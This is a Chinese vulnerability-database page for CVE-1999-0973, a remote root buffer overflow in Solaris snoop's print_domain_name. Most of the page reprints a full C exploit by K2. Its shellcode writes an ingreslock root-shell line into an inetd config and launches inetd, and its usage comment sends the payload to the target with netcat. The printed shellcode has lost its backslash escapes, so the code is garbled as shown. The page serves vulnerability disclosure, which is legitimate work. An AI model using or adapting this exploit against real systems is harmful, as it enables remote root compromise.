Solaris snoop (print_domain_name)缓冲区溢出漏洞

Solaris snoop (print_domain_name)缓冲区溢出漏洞

漏洞ID 1105638 漏洞类型 缓冲区溢出
发布时间 1999-12-07 更新时间 2005-05-02
图片[1]-Solaris snoop (print_domain_name)缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0973
图片[2]-Solaris snoop (print_domain_name)缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199912-035
漏洞平台 Solaris CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19663
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-035
|漏洞详情
Solaris的snoop程序存在缓冲区溢出漏洞。远程攻击者借助使用snoop冗长模式下的长域名可以获得root权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/858/info

If a solaris machine is running snoop in verbose mode, it may be possible to compromise its security remotely by exploiting a buffer overflow in snoop. The problem is a buffer with a predefined length of 1024 that can be overflowed in the print_domain_name function. The priviliges granted to arbitrary code which could be executed would be those of the user running snoop, root. 

/* 
   by: K2,
   version .2
   this is a funny Solaris.
   remote Solaris 2.7 x86 snoop exploit
   rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
   
   run with ( ./snp ) | nc -u target_host_network 53
   requires target host to be running "snoop"
   
   verified with patch 108483-01
   
   thx str/horizon for shellcodes.  Hi plageuz
   Hi mom.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char shell[] =
"xEBx37x5Ex8Dx5Ex10x89x1Ex83xC3x08x89"
"x5Ex04x83xC3x03x89x5Ex08x83xEBx0Bx8D"
"x0Ex89xCAx33xC0x89x46x0Cx89x46xF5x89"
"x46xFAx88x46x17x88x46x1AxB0x3Bx52x51"
"x53x50x9Ax73x74x72x6Ex07x72xE8xC4xFF"
"xFFxFFx31x33x20x4Ax61x6Ex20x31x39x39"
"x38x2Dx2Dx73x74x72x2Fx62x69x6Ex2Fx73"
"x68x28x2Dx63x29 echo w00w00;echo "ingreslock" 
"stream tcp nowait root /bin/sh sh -i" >>/tmp/w0;"
"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";


#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

const char x86_nop=0x90;
long nop=NOPDEF,esp=0x804646c;
long offset=DEFOFF;
char buffer[SIZE];

int main (int argc, char *argv[]) {
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    fprintf(stderr,"0x%xn",esp+offset);
    printf("%s", buffer);

    return 0;
}
|参考资料

来源:BID
名称:858
链接:http://www.securityfocus.com/bid/858

相关推荐: SIRCD Server 0.5.2/0.5.3 – Operator Privilege Escalation

SIRCD Server 0.5.2/0.5.3 – Operator Privilege Escalation 漏洞ID 1054261 漏洞类型 发布时间 2003-11-20 更新时间 2003-11-20 CVE编号 N/A CNNVD-ID N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享